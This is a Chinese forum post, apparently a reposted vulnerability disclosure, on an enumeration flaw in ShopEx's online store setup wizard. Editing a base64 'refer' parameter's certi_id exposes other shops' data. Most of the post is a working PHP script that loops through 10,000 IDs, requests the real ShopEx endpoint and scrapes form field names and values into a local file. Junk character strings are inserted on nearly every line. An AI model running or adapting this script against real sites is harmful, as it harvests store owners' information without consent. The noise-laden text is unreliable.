|
|
简要描述:, _, V0 M* ~5 |! q+ D5 S7 F- i" S
ShopEx某接口缺陷,可遍历所有网站( D; t" B1 ?/ ]
详细说明:* e/ \4 b8 I+ y0 w
问题出现在shopex 网店使用向导页面 1 _8 B+ z8 | I& k
2 J/ G, D$ ^3 d( M- A2 w) F
; p2 {$ t5 o2 E0 i% U
! T* D5 L* I, dhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=4 V% p* W4 S+ s# o1 Y, x
- b6 R; }* W. r G; e, g, s
. O8 l6 x8 ]3 H4 D9 e {. n- }2 }0 [* L
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}+ F( ~" q5 ?2 i5 r. Y3 w2 O; s
4 z' l# G! M1 D2 E$ ~1 C
3 Y- P1 w5 Y; _) f
; j. e h; `+ k4 L I/ M我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
1 W9 ]7 I* Y% f; o, b! [
1 v! Q3 I' u# \# l8 H" |) b/ W2 ?6 r+ g% N$ ~8 O. }
: M( }5 g; V N
<?php
0 R! T% U c5 c: O$ h8 r# u0 v( I
for ($i=1; $i < 10000; $i++) { //遍历' X2 Y7 x9 m# f, \3 {
4 h1 @) r* x; |: L ShowshopExD($i);/ v& c. v, [2 B/ F
( p- p0 v9 T9 g" X, m1 v. s
}
8 {2 [3 T/ }/ N' o
; i' r5 [" R( h$ w9 A4 R8 t+ ^: U function ShowshopExD($cid) {
& l# o! q2 ?( A" R
3 w- u# V7 ~5 s* n/ C8 a $url='http://guide.ecos.shopex.cn/step2.php';- d$ R2 Y9 ]+ {8 V3 m
* y- b8 ]1 I7 }3 w: a9 J/ w5 h $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
/ \' m+ t- X2 O. l0 y
$ j8 q4 i$ w0 V4 A- J $url = $url.'?refer='.$refer;" l$ B% z6 M2 S p2 q P
' i& E0 K. S! h1 t8 H
$ch = curl_init($url);
2 H! S9 I& H9 K9 r: S* j4 I1 { s5 F
& l' S" q5 W1 i- b+ j curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;& f" e0 p6 W) _8 A
: {3 W3 ? c% z8 q0 O
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
# Z+ Z; j+ L' e/ M% Q
|+ o4 x h3 C $result = curl_exec($ch);
! f- n5 X) ~# h7 L3 k2 Y( M1 P
1 q) D7 B6 R$ @3 |% ^) F1 L $result = mb_convert_encoding($result, "gb2312", "UTF-8");
# o% m9 I- k# P7 g* @ [4 ?/ e
7 ^6 W! x6 [7 }7 W9 y4 R5 s if(strpos($result,$refer))
, p6 G7 s" e" ^4 e7 E9 J9 @6 _
) P$ S5 r: T3 W0 A" f) B _ {. _' M- }! a: ]8 d O7 a
8 H9 k l+ n7 c% `# Y" l" z$ \7 s $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
: ]- c, N5 X9 Q, i( G, Q5 C3 I
3 z/ g1 e) g0 |' D preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
8 r8 t7 J1 e2 g7 a
0 z* [( y2 J5 w% |/ P; a" R foreach ($value[1] as $key) {% G& o3 i$ O! z8 q, m% g- O1 Q
# W0 E8 h1 n ]2 t/ h& m4 L
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);5 C( F- W3 `# G0 a1 L5 Y
: _/ n+ a0 N/ H) Z |/ N echo $res[1][0].':'.$res[3][0]."\r\n";
2 ~# v1 b% V4 V; M$ a6 k6 P; o* a! B& D' s( L3 J* d: _
$col =$res[1][0].':'.$res[3][0]."\r\n"; ) Y# J' |' M* j
1 k0 @7 u# }: V& O& ], @. l: k
fwrite($fp, $col, strlen($col)); , \6 X! h+ r' O# Q) r! d9 i
' r" K$ U9 I% R* d }2 B$ x! s4 x* J0 M0 e
c/ J+ v* w% }$ k8 R4 o5 k echo '--------------------------------'."\r\n";8 h" G8 r) `* k! `6 W) m
# m$ U+ J5 ]0 k4 P: t
fclose($fp);
6 M1 A' {9 j( ^# W! [9 x! X' g/ W7 q3 A: h
}' \$ D/ R% Z" B7 |
# Z) R( H- \3 b
flush();
2 l; ?, c' s% ^1 n" |# \$ t: y; q q/ m' r
curl_close($ch);
! d3 i0 V! i0 b2 r& {( S: v n
6 D: n, `5 r( R$ r9 X! D0 z0 | } c/ K7 ]$ T$ {5 R
7 B' c9 G% O" T3 U4 @. Q9 N?>& h& r1 T0 O a; d& e
漏洞证明:
( o" u# w0 X( e, o H# Y: j6 Nhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg* [( ?9 Y8 X$ r9 V
refer换成其他加密方式* @& j$ l4 w4 E6 }% Y" O7 C" N0 U
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对